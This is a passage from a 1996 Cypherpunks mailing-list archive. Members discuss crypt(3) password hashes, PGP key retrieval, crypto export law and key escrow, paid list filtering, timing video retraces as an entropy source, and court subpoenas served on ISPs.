> smart enough to realize that the user was submitting cleartext instead
> of an encrypted password when setting up their account.
>
> Is there any way to check and see if the text the user
> supplies initially has been encrypted or is cleartext?

The only way I can think of is if the text that the user supplies is not 13
characters long and contains characters not used in crypt(3) base64 encoding,
then the text is definitely not a hashed password.  This would catch nearly
all cleartext passwords, although there is a little room for error.  FYI, the
characters used for base64 encoding are [0-9],[A-Z],[a-z],'/', and '.'.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMWRTIbZc+sv5siulAQGf3AP+LfrlTrpvQgFju2k5yOyUTAxHDGxjHWFg
9M32OU1/Lsj9DtVk/WJBqBmy3SfHJ0ZdppZlxsrT4eywTUaqeg+dOxrQ/WPMPz8c
smNykbfmVvzdiwFn4pQJ4/mPiSzFOSz3vshgMnZHzum6SpQ1+Hd4WYPD0Qcsc83q
5SKrfDRfVSs=
=IgUR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 5 Apr 1996 15:12:57 +0800
To: jimbell@pacifier.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <01I35I5KOWUU8ZE6BJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: jim bell <jimbell@pacifier.com>

>Far more acceptable (and useful to us)  would be a rule which would mandate 
>the government's allowing the export of any program that had, say, the key 
>security provided by IDEA or less, regardless of what it did with that 
>encryption.  (Not that I want _any_ restrictions; it's just that such a 
>limit would make it impractically large to attempt to crack.)

	As I pointed out earlier, one way (that would cause the NSA types
problems trying to stop) would be to make legal for export anything which was
no harder for the NSA to break than what's already out of the country.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 5 Apr 1996 14:55:36 +0800
To: cypherpunks@toad.com
Subject: Re: pgp keys
In-Reply-To: <199604041655.LAA01570@laura.voicenet.com>
Message-ID: <Pine.LNX.3.92.960404175528.4389A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 4 Apr 1996 jpps@voicenet.com wrote:

> Is there a reliable method for obtaining the pgp public key for an
> arbitrary email address? elm-2.4pl24pgp3 does a logical join on my local
> alias and keyring files; what I'm looking for is a way for my mua/mta to
> obtain keys I do not have.
>
> I've caught some of the discussion on key servers, and noted some
> people's use of their signature, plan, or home page to distribute their
> keys.  Are some combination of these suitable today? Is there a
> parseable convention in use for extracting keys from mail/finger/html?
> Is there a "get_keyd" floating about?

Mkpgp does what you describe.  You can get it by sending mail to slutsky@
lipschitz.sfasu.edu with a subject of "mkpgp".  As for extracting keys from
finger info or a web page, you can just run pgp on a file containing the
user's homepage or .plan file.  On Unix, a command like "finger user@host.
domain | pgp -kaf" will work.  Basically a combination of fingering the user
and querying the key servers will work most of the time.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMWRUeLZc+sv5siulAQE82gP/ffidQVvrdrCizxb+0pAbNRsF0k2AcZpz
ukqDuEv082zRV4JHcUodgKjIQ6EMH7P4zw+5HTgzIRp1jNl0k82XZn6NdYMlfIsE
FOui0/P2i4LTwDAP5zl3lUQmq1x8pxnHNi195m1xP7e9KfTYpXPtxhQuhyp3LJCg
pVSMDBpcTL0=
=7u18
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 5 Apr 1996 18:54:50 +0800
To: llurch@networking.stanford.edu
Subject: Re:  The Law Loft: Surviving the Biometric I.D. Card
Message-ID: <01I35II8ALVW8ZE6BJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Rich Graves <llurch@networking.stanford.edu>

>The replacement of income tax with sales and real estate taxes -- despite
>the fact that such a move would be incredibly regressive -- would be a
>very good thing for freedom.

	Agreed (re:freedom) ... but why are you claiming that real estate
taxes are regressive? Unless there's some nonsense like Louisiana's homestead
exemption (own your own home, get 100,000 subtracted off of the value for
property tax purposes... which is just as biased against apartment-dwellers
and renters as the morgage interest deduction), real estate taxes should be
even or "progressive" in their distribution of the tax burden.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 5 Apr 1996 15:54:56 +0800
To: unicorn@schloss.li
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <01I35J1KFFB68ZE6BJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I have been doing some thinking about the whole key escrow retrieval
matter. There are a couple of situations in which I can see real reasons for
doing voluntary key escrow of sensitive material:
	A. You're afraid of losing the key.
	B. Your organization is afraid that you'll lose the key or be
unavailable.
	The second can be handled internally via key sharing; if all the people
you share the key with have as much to lose by the information getting out as
you do, then they should be trustworthy and as hard to subpoena as you are.
Encrypting the shared section with another, appropriate key should take care of
the cop-stealing problem (i.e., they break into the machine).
	The first is more of a problem. If where you've entrusted your keys is
known, then the cops can come in and strong-arm/subpoena your keys away. Thus,
the basic protection mechanism should be denying them that knowledge. (Another
protection mechanism is key sharing between key escrow organizations.)
	In other words, anonymous remailers with stable nyms for the key escrow
organizations, together with fully anonymous digital cash. One problem in this
is how the organization's reputation originally is established so people will
deal with them so they can get a reputation.... etcetera. The basic method of
doing so appears to be to post a digital cash bond. (I don't know the
mathematics well enough to tell whether one could post verifiable digital cash
with it still not being usable without a decryption step. If one can't, that's
a real problem... but I suspect that one can.) The encryption on such a bond
should be put into the hands of a group of above-ground "judges" via secret
sharing, who would be a group of people chosen by the key escrow organization
in hopes of their being trusted to resolve any disputes. Of course, digital
receipts would be a big help here...
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 5 Apr 1996 15:53:20 +0800
To: unicorn@schloss.li
Subject: Re: Note: Problems Confronting the Asset Concealer [Part 1 of 2 ofVolume I]
Message-ID: <01I35JEYE35K8ZE6BJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	A very interesting essay, although I haven't had time to read over it
in full (3 papers and an oral presentation due). I do have one question, and
it concerns the introduction. You state that you are leaving out material that
is currently in use - i.e., some of the most useful material. Why? I know that
you don't currently have a fully anonymous nym... but if that was the reason,
why not just release it under a fully anonymous nym? Mistrust of the remailers,
or what?
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Apr 1996 16:22:06 +0800
To: cypherpunks@toad.com
Subject: Re: .sig followup
Message-ID: <ad89b81814021004f2eb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:32 PM 4/4/96, Rich Graves wrote:
>
>CDAmeisters as an "invasion," but I really don't buy this stuff about
>Cyberspace (a word only Barlow can say with a straight face) being a new
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>"place." It's just a communications medium, no more and no less real than
>anything else. I think it would be better to stress that the online *is*

This is not true. I use the word "cyberspace" with a straight face. It has
long seemed perfectly descriptive to me.

This doesn't mean I buy Barlow's "let's just declare independence" schtick.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Apr 1996 16:20:45 +0800
To: "Peter N. Posch" <cypherpunks@toad.com
Subject: Re: unsubscrive * Peter.Posch@koeln.netsurf.de
Message-ID: <ad89b90a150210042bde@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:59 AM 4/4/96, Peter N. Posch wrote:
>unsubscrive * Peter.Posch@koeln.netsurf.de

For the nth fucking time:

How to subscribe to the Cypherpunks mailing list: send a message to
"majordomo@toad.com" with the body message "subscribe cypherpunks". To
unsubscribe, send the message "unsubscribe cypherpunks" to the same
address. For help, send "help cypherpunks".  Don't send these requests to
the Cypherpunks list itself. And be aware that the list generates between
40 and 100 messages a day.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Busarow <dan@dpcsys.com>
Date: Fri, 5 Apr 1996 17:30:47 +0800
To: Eric Eden <erice@internic.net>
Subject: Re: Using crypt()
In-Reply-To: <199604041747.MAA11669@ops.internic.net>
Message-ID: <Pine.SV4.3.91.960404184726.12501A-100000@cedb>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Apr 1996, Eric Eden wrote:
> The only problem is when users mistakenly supply cleartext initially,
> they can never update their information because the program isn't
> smart enough to realize that the user was submitting cleartext instead
> of an encrypted password when setting up their account.

Far from bulletproof, but the three Unice I just checked, SCO Unix, 
UnixWare and FreeBSD, all generate 13 character encrypted passwords.
I believe this is the norm for crypt.

Very few people around here have 13 character clear text passwords,
those that do are either very security concious and won't use CRYPT-PW
or it's just coincidental and their bad luck.

Anyway, requiring the supposedly encrypted password to be 13 characters
is probably about the best you can do.  If crypt generated recognizable
patterns it wouldn't be very useful, would it?

I'm still debating whether or not to allow our clients to use this 
option.  We may require clients registering domains to pick up a copy 
of PGP first.  

Dan
-- 
 Dan Busarow
 DPC Systems
 Dana Point, California





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Fri, 5 Apr 1996 17:38:55 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why pay???
In-Reply-To: <ad89c05a16021004e389@[205.199.118.202]>
Message-ID: <Pine.SUN.3.92.960404190728.25894F-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Apr 1996, Timothy C. May wrote:

>
> (Goldwater and Heinlein got it slightly wrong when they said "There ain't
> no such as a free lunch." While true in many ways, TANSTAAFL ignorest the
> great willingness of people to donate time, effort, articles, etc. In fact,
> I've put many thousands of hours into the Cypherpunks list, for which I've
> received not a single centime of compensation. And I have no problem with
> this, provided it remains voluntary.)
>

The fact that you choose not to charge for your time does not make your
time worthless.  The value your voluntary efforts add should be assigned
due compensation even if you choose to waive it.

The failure to take such contributions into account is one of the most
serious flaws in all current economic paradigms.  I think this will become
more apparent in decades to come, as old concepts of `work' and `jobs'
obsolesce.

Charles Bell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 5 Apr 1996 17:27:50 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Fascinating troll with forged newgroups
Message-ID: <199604050320.TAA20210@dfw-ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:00 AM 4/4/96 -0800, you wrote:
>Looks like the Nazis forged newgroup messages for rec.fag-bashing,
>rec.org.kkk, and 100 RFD'd groups in order to get their little messages
>across.
>
>How entertaining. What a marvelous new form of net.vandalism they've
>discovered. Or is this not new?

Oh, no, this sort of thing is not new.  It happened more before the 
Great Renaming, but it's not new.  The other possibility is it's troll
trying to make it _look_ like the Nazis did it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Fri, 5 Apr 1996 17:43:35 +0800
To: cypherpunks@toad.com
Subject: Re:Why pay???
Message-ID: <v02140b00ad8a416cbdbd@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:44 PM 4/4/96, kreidl@newrock.com is rumored to have typed:
> [...regarding CPLite subscriptions...]
>
> Why would I pay if I can get it for free this way??????

Because then useless noise (such as the message you posted) would
automagically get filtered out.  Some people do not have the time
to filter the noise from signal on mailing lists and this service
caters to their needs.

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Apr 1996 16:50:27 +0800
To: cypherpunks@toad.com
Subject: Re: Why pay???
Message-ID: <ad89c05a16021004e389@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:44 PM 4/4/96, kreidl@newrock.com wrote:
>>
>>Thanks for your interest in Cypherpunks Lite.
>>
>>I provide a moderated version of the Cypherpunks list called
>>"Cypherpunks Lite".  A one year subscription costs US$20 and is

>Why would I pay if I can get it for free this way??????

You are of course free not to subscribe. A solution I think 98% of us would
subscribe to, so to speak.

Personally, I take the full Cypherpunks feed. Others may take Eric
Blossom's for-a-fee filtered list, still others may take the
variously-priced filtered lists by others.

As it should be.

(Goldwater and Heinlein got it slightly wrong when they said "There ain't
no such as a free lunch." While true in many ways, TANSTAAFL ignorest the
great willingness of people to donate time, effort, articles, etc. In fact,
I've put many thousands of hours into the Cypherpunks list, for which I've
received not a single centime of compensation. And I have no problem with
this, provided it remains voluntary.)


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 5 Apr 1996 15:55:44 +0800
To: cypherpunks@toad.com
Subject: A new law in the making?
Message-ID: <199604050206.UAA01078@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu,  4 Apr 1996 00:24:08 -0500 (EST)
> From: "Declan B. McCullagh" <declan+@CMU.EDU>
> Subject: FC: CDA Court Challenge: Update #4
> 
> The court wasn't happy with Boe's response. It gave Shea and the
> government until April 17 to decide to include the entire record of
> the Philly lawsuit -- and said that if they don't, the court would
> appoint its *own* computer expert to demo the Net and blocking
> software on April 30.

This is a great idea if carried a little farther. Require courts in cases
using technical or otherwise special evidence to appoint an indipendant
expert to compare compare with the defence and prosecution experts.

> litigators who do their homework." (Of course, Taylor conveniently has
> deluded himself into believing the CDA is constitutional.)

Are *any* of the current legal actions involved using either the 9th or 10th
Amendment in their case?

> We're back in court on 4/12, 4/15, and possibly 4/26.

Good luck!


                                                 Jim Choate
                                                 CyberTects
                                                 ravage@ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Apr 1996 18:03:47 +0800
To: cypherpunks@toad.com>
Subject: Re:
Message-ID: <ad89ceca1802100447ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 PM 4/4/96, AndrÈ Gil wrote:
> unsubscrive * agil.home@mail.telepac.pt
> unsubscrive * agil.home@mail.telepac.pt
> unsubscrive * agil.home@mail.telepac.pt


What the hell is going on? We seem to be under attack by foreigners.

--Tim



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Fri, 5 Apr 1996 19:38:57 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: Video retraces as a source of entropy...
Message-ID: <199604050236.VAA01556@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  4 Apr 96 at 5:58, Laszlo Vecsey wrote:

[..]
> > In pseudo-C:
> > 
> > int retrace(void) { // test for video retrace
> > #ifdef __MSDOS__
> >   return (port[0x3da] & 8); // Some VGA, maybe EGA cards
> > #else
> >   // your OS here
> > #endif
> > }

> >   [..]
> >    x = 0;
> >   while (!retrace()) x++;

> As far as I know, while(retrace()) will loop until vertical retrace 
> begins, and then you call while(!retrace()) and that will loop until 
> vertical retrace is over. (Or it may be the other way around).

Sloppy pseudo-C code.  The code I've been experimenting with waits 
until it's no longer in a vertical retrace (if one is still active 
since the last sample) and then collects the sample when the next 
vertical retrace occurs.

[..]
> What if the screen is filled with different colors, or shapes. On some
> monitors you can actually see the size of the screen changing, warping out
> a little.. maybe the time for retrace will be different when painting
> screens with different data. 

I haven't done a lot of tests yet.... and even then, it's probably 
very system specific.


 
Rob. 

---
Send a blank message with the subject "send pgp-key"
to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 5 Apr 1996 18:04:05 +0800
To: cypherpunks@toad.com
Subject: Re: Bad news from Judge Richey
In-Reply-To: <01I35I2AXN1C8ZE6BJ@mbcl.rutgers.edu>
Message-ID: <JT8VLD113w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> writes:
> 	Umm... one would guess that a federal judge would be against the
> whole Assasination Politics idea, whether or not he himself became a target.

It's worth noting that one of the new newsgroups that Rich Graves mentioned is:
talk.politics.assassination             Assassination Politics
My congratulations to Jim Bell on getting his own newsgroup!

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Fri, 5 Apr 1996 20:13:00 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <2.2.32.19960405071419.0068c65c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:37 PM 4/4/96 -0800, you wrote:
>At 11:52 PM 4/4/96, AndrÈ Gil wrote:
>> unsubscrive * agil.home@mail.telepac.pt
[snip]

>What the hell is going on? We seem to be under attack by foreigners.
>
>--Tim

It's hard to understand.  I can't velieve it.

>Voycott "Vig Vrother Inside" software!
>We got computers, we're tapping phone lines, we know that that ain't allowed


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 5 Apr 1996 22:56:49 +0800
To: James Gleick <gleick@around.com>
Subject: Re: e$ Signorage
In-Reply-To: <1.5.4b13.32.19960404143637.006a92b8@pop3.interramp.com>
Message-ID: <Pine.SOL.3.91.960404231459.28168A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Apr 1996, James Gleick wrote:

> Seigniorage is actually the Government's interest income on all the
>currency in circulation. It's not obvious, but it's true, that the Fed

And there I was thinking it was the right for Greenspan to sleep with any 
unmarried woman on the eve of her wedding...



---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agil.home@mail.telepac.pt (André Gil)
Date: Fri, 5 Apr 1996 14:38:57 +0800
To: "'cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199604042352.XAA10616@mail.telepac.pt>
MIME-Version: 1.0
Content-Type: text/plain


 unsubscrive * agil.home@mail.telepac.pt
 unsubscrive * agil.home@mail.telepac.pt
 unsubscrive * agil.home@mail.telepac.pt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agil.home@mail.telepac.pt (André Gil)
Date: Fri, 5 Apr 1996 15:27:51 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199604042353.XAA10676@mail.telepac.pt>
MIME-Version: 1.0
Content-Type: text/plain


 unsubscrive * agil.home@mail.telepac.pt
 unsubscrive * agil.home@mail.telepac.pt
 unsubscrive * agil.home@mail.telepac.pt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 5 Apr 1996 19:43:02 +0800
To: Charles Bell <tcmay@got.net>
Subject: Re: Why pay???
Message-ID: <199604050818.AAA25870@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:14 PM 4/4/96 -0800, Charles Bell wrote:
>On Thu, 4 Apr 1996, Timothy C. May wrote:
>
>>
>> (Goldwater and Heinlein got it slightly wrong when they said "There ain't
>> no such as a free lunch." While true in many ways, TANSTAAFL ignorest the
>> great willingness of people to donate time, effort, articles, etc. In fact,
>> I've put many thousands of hours into the Cypherpunks list, for which I've
>> received not a single centime of compensation. And I have no problem with
>> this, provided it remains voluntary.)
>>
>
>The fact that you choose not to charge for your time does not make your
>time worthless.  The value your voluntary efforts add should be assigned
>due compensation even if you choose to waive it.
>
>The failure to take such contributions into account is one of the most
>serious flaws in all current economic paradigms.  I think this will become
>more apparent in decades to come, as old concepts of `work' and `jobs'
>obsolesce.

IMHO, another failure is that not all compensation can be expressed in
money.  Feeling good about making a contribution is an example.  Another is
the "guaranteed" place in heaven for the suicide bomber.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Apr 1996 19:16:26 +0800
To: cypherpunks@toad.com
Subject: Re: Why pay???
Message-ID: <ad8a0b671a02100485a6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:14 AM 4/5/96, Charles Bell wrote:

>The fact that you choose not to charge for your time does not make your
>time worthless.  The value your voluntary efforts add should be assigned
>due compensation even if you choose to waive it.

I didn't say my time is "worthless."

But the term "worthless" (and "worth" and "value" and suchlike) are not
defined in absolute terms, only in market terms. Commodities, including
labor, are valued by what others will exchange for them.

The notion that my efforts "should be assigned due compensation" is a
flawed view of how markets determine prices and wages. There is no
"assignment" absent a market.

(On the other hand, I certainly will not object if Charles calls together
his like-minded friends, evaluates my postings over the past several years,
and "assigns due compensation." Hey, it won't cost me anything. But somehow
I doubt I'll see any of this due compensation that Charles and Company
assign to me.)

This gets into economic issues, so I'll drop it here. I just wanted to
correct this misapprehension that I was claiming my time is "worthless."

>The failure to take such contributions into account is one of the most
>serious flaws in all current economic paradigms.  I think this will become
>more apparent in decades to come, as old concepts of `work' and `jobs'
>obsolesce.

All the more reason to get beyond our current system, where governments set
minimum wages, impose salary freezes, sue companies for charging too much
(or too little) for products, and interfere in economic transactions in
many other ways.

With strong cryptography, at least the purely crypto-anarchic transactions
will be this way.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Fri, 5 Apr 1996 19:22:08 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Article on PGP Viacrypt
Message-ID: <682D3253>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

----------------
Received: by attpls.net with Magicmail;3 Apr 96 09:19:59 UT
Date: 5 Apr 96 02:14:38 UT
Sender: owner-cypherpunks@toad.com (owner-cypherpunks)
From: owner-cypherpunks@toad.com (owner-cypherpunks)
Subject: Re: Article on PGP Viacrypt
To: walter@cithe302.cithep.caltech.edu (Chris Walter)
cc: cypherpunks@toad.com (Cypherpunks)
Message-Id: <199604030451.UAA06038@slack.lne.com>
In-Reply-To: <<WALTER.96Apr2124421@cithe302.cithep.caltech.edu> from
 "Chris Walter" at Apr 2, 96 08:44:20 pm>
X-X-AUTHENTICATION-WARNING: toad.com: majordom set sender to
 owner-cypherpunks using -f

I would have to agree that if businesses are to use PGP that "good" key
escrow MUST be provided.

Peace ..Tom

Chris Walter writes:
> 
> Hi Folks,
> 
> There is an interesting article by Simon Garfinkle in this
> morning's(Apr 2nd) electronic version of the San Jose Mercury news.
> Its on the index page so I don't think you need an account to read
> it.
> 
> The article deals with the new key management features and extensions
> in Viacrypt and how PRZ is upset since it allows employers to read
> their employees messages.

I read it this morning.
The gist is that this new evil PGP lets your employer
SPY ON EVERYTHING YOU DO!  And was written in about
that tone.

I was disappointed by the article.  I don't know if Simson
is deluded about the use of Viacrypt PGP, or the article got
hacked up by by ignorant/malicious editors, or my understanding of
Viacrypt PGP is competely wrong.

I thought the purpose to putting key escrow (that's real escrow
not GAK) into PGP was to allow its use for business purposes.
Often in business use you're not too concerned with keeping secrets
from
your employer or fellow employees, but do want to keep those
secrets within the company.  And there is a real concern that you
might encrypt company-secret stuff and then fall off your motorcycle
and get run over by a truck, leaving your securely-encrypted company
secrets suddenly inaccessable to the company...
Key escrow, with the keys held by the company, is designed to prevent
this problem.

The article failed to mention that you're not prevented from using
a non-escrow PGP for personal secrets (could Viacrypt PGP prevent
you from using PGP 2.6.2?  I don't think so) and made it sound
like Viacrypt PGP is designed to allow nosy employers to spy on
employees encrypted email.  I guess it would, if the employers were
that nosy and the employees dumb enough to use company-provided
escrowed PGP to send personal secrets.  But that theory's about
as credible as the Clipper chip proponents's "dumb crooks" theory
where crooks would want encrypted phones but be dumb enough to
forget that the Government held the keys...

Simson's the one main-line journalist who writes about internet
and computer issues that I still think has a clue, and has written
a pretty good book about PGP, so I'd be suprised if he got this
so wrong.  On the other hand, I haven't used this new Viacrypt PGP 
and I'm going on what I think that escrowed PGP is really good for.
Maybe my feeling about that have blinded me to reality.  Or, most
likely, the editor(s) hacked the story up either out of ignorance
or to present a viewpoint that they had already decided they want to
present, truth be damned.


If I wanted to present a conspiracy theory about the government
wanting to discourage use of PGP for businesses, this would be the
place to do it.  If PGP gains a foothold in the businessplace
it'll be nearly impossible to eradicate, given the fact that
(big) business essentially runs the country.  Key escrow will
make PGP a lot more usefull to businesses, increasing its use.
I'm sure you can fill in the rest of the theory.


> http://www.sjmercury.com/business/priv401.htm
> 


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com 
http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E
27 29 AF


---
 NOTICE: This message originally included graphics and/or sounds which
can only be received by AT&T PersonaLink(sm) subscribers. You received
only the text portion(s) of the message.  Please contact the sender for
information that was deleted. To learn how to send and receive
graphics, voice and text messages via AT&T PersonaLink Services, call
1-800-936-LINK.  

----------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 5 Apr 1996 20:30:32 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u4tAl-00090wC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960404182031.758A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Apr 1996, jim bell wrote:

> At 11:34 PM 4/3/96 -0800, Bill Stewart wrote:

> >Black Unicorn is absolutely correct that this is generally the law.
> >Jim Bell is absolutely correct that laws like this are offensive and outrageous.
> >Unfortunately, Jim then rants at Unicorn for suggesting that this
> >would be the case; you'd think he'd be the first to realize that
> >there are laws out there that are offensive and outrageous and enforced.
> 
> I really don't think you're giving me enough credit.  I am fully aware that 
> in the past, the organizations on which wire-tap-type subpoenas were served 
> (primarily AT+T, "The phone company") were very cooperative with the police 
> and probably "never" challenged the subpoena. There is the law, and there is 
> the usual reaction to that law, and I expect that much of Unicorn's position 
> is based on a (false) assumption that this reaction will necessarily 
> continue unchanged.

Now, if this is your postion, let's see some support.

If you're trying to tell me that your going to see some mass uprising of 
the baby ISP's just because compelled discovery orders leave a sour taste 
in Mr. Bell's or anyone else's mouth, I just think you are a fool.

Compelled discovery orders work because they are backed with the 
very credible threat of financial and custodial sanctions.  Obstruction, 
or conspiracy is a crime, and in the case of the FBI, a federal crime of 
some magnitude.

While some ISP's may indeed feel they are able to resist the whims and 
enforcement powers of the United States, they are likely to be offshore, 
